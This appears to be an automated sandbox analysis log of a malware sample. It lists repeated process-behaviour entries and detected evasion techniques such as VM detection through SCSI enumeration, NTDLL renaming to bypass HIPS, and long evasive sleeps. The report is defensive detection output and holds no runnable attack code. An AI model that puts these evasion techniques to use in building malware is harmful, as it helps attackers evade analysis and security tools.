Source: C:\Users\user\AppData\Local\Temp\319A.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\319A.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\319A.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\319A.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\319A.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\319A.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\319A.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\319A.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\319A.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\319A.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\319A.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\319A.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\319A.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\319A.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\319A.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\319A.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\319A.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\319A.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\319A.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\319A.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\319A.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\319A.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\319A.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\319A.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\319A.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\319A.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\319A.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\319A.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\319A.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\319A.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\319A.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\319A.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\319A.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\319A.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0a4fc5b5-fef6-4ac6-8dad-72b92a431021\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\0a4fc5b5-fef6-4ac6-8dad-72b92a431021\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\0a4fc5b5-fef6-4ac6-8dad-72b92a431021\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\0a4fc5b5-fef6-4ac6-8dad-72b92a431021\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\0a4fc5b5-fef6-4ac6-8dad-72b92a431021\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\0a4fc5b5-fef6-4ac6-8dad-72b92a431021\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\0a4fc5b5-fef6-4ac6-8dad-72b92a431021\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\0a4fc5b5-fef6-4ac6-8dad-72b92a431021\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\69B5.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\69B5.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\69B5.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\0a4fc5b5-fef6-4ac6-8dad-72b92a431021\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\32BC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\32BC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\32BC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\3c9b9832-1586-402f-8df1-a3ced6cc50c2\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\3c9b9832-1586-402f-8df1-a3ced6cc50c2\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\3c9b9832-1586-402f-8df1-a3ced6cc50c2\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\3c9b9832-1586-402f-8df1-a3ced6cc50c2\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\3c9b9832-1586-402f-8df1-a3ced6cc50c2\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\3c9b9832-1586-402f-8df1-a3ced6cc50c2\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\3c9b9832-1586-402f-8df1-a3ced6cc50c2\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\3c9b9832-1586-402f-8df1-a3ced6cc50c2\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Yara detected AntiVM3
Source: Yara match File source: Process Memory Space: 5D4.exe PID: 5344, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: 97A5.exe, 00000014.00000002.368885108.00000000004D9000.00000004.00000020.sdmp, 192F.exe, 0000001D.00000002.419614740.000000000321A000.00000004.00000020.sdmp Binary or memory string: ASWHOOK
Checks if the current machine is a virtual machine (disk enumeration)
Source: C:\Users\user\Desktop\SkB6zJ6H3N.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\SkB6zJ6H3N.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\SkB6zJ6H3N.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\SkB6zJ6H3N.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\SkB6zJ6H3N.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\SkB6zJ6H3N.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\97A5.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\97A5.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\97A5.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\97A5.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\97A5.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\97A5.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\cviueca Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\cviueca Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\cviueca Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\cviueca Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\cviueca Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\cviueca Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\192F.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\192F.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\192F.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\192F.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\192F.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\192F.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B5.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\69B5.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\69B5.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\69B5.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\69B5.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\69B5.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Renames NTDLL to bypass HIPS
Source: C:\Users\user\AppData\Local\Temp\192F.exe File opened: C:\Windows\SysWOW64\ntdll.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\192F.exe File opened: C:\Windows\SysWOW64\ntdll.dll Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\explorer.exe TID: 4672 Thread sleep count: 576 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 3008 Thread sleep count: 184 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 5672 Thread sleep count: 258 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 6524 Thread sleep count: 344 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 6512 Thread sleep count: 95 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 6520 Thread sleep count: 144 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 3828 Thread sleep count: 311 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 5796 Thread sleep count: 77 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32BC.exe TID: 6624 Thread sleep time: -90000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6744 Thread sleep time: -922337203685477s >= -30000s
Contains long sleeps (>= 3 min)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 576 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5595
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2723
Found dropped PE file which has not been started or loaded
Source: C:\Windows\explorer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75B0.exe Jump to dropped file
Source: C:\Windows\explorer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\86B8.exe Jump to dropped file
